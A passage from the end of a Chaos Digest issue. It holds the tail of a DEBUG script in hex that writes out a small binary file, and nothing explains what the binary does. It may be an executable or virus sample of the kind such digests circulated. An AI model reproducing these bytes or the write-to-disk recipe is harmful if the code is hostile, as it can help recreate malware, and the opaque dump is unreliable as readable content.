2D B7 BC 31 29 D2 CA e 03B0 C7 5A 34 C0 B6 28 8E 68 83 2C 3A A5 AE 7F 3E E5 e 03C0 1B 90 3B 7F B1 A4 73 2C B1 BC 7D 2C B1 B4 76 2C e 03D0 F7 09 8E 16 F7 09 82 29 79 A3 B6 63 3E A5 AE A5 e 03E0 3E 1A D7 E5 1B 9C 01 A5 AE FB 3E E5 1B 9C 20 92 e 03F0 BA 28 F7 09 6C 75 82 0C 1F A5 AE 76 3E E5 1B A5 e 0400 8C 7B 3E 97 3A 29 83 2C 3A D4 C9 8C 85 28 3B D7 e 0410 DD C0 22 28 8E 66 83 2F 3A A5 AE 16 3E E5 1B 5A e 0420 F6 C0 06 28 8E 67 D1 DD C6 DB 9E EB B1 DD BB EE e 0430 79 29 B1 D6 83 05 3A 85 09 AE 61 2C 91 CA C2 A3 e 0440 CF EB 82 28 78 1B F3 1B E8 E5 1B EB 82 2A 78 1B e 0450 E8 1B F3 E5 1B EB 82 2A 07 A5 AE A5 3E E5 1B EB e 0460 D2 DB C5 5A 11 A3 E2 7B D2 C9 C5 93 15 28 CD DB e 0470 B1 E0 61 79 D2 E3 C5 71 6B 9C 7A 91 15 28 B7 BC e 0480 55 29 F7 09 48 2E 63 61 D9 2A D1 C4 8E 16 F7 09 e 0490 F9 02 14 6B 75 65 3A 02 14 02 3A 06 14 28 3B 28 e 04A0 A2 3F 36 9E 1A 2D 3A 28 D1 71 AA 7C 33 E5 1A B8 e 04B0 D3 49 3A A0 12 12 3A 7E 3B 99 24 1A FA E7 B4 2E rcx 03C0 w q ------------------------------ End of Chaos Digest #1.42 ************************************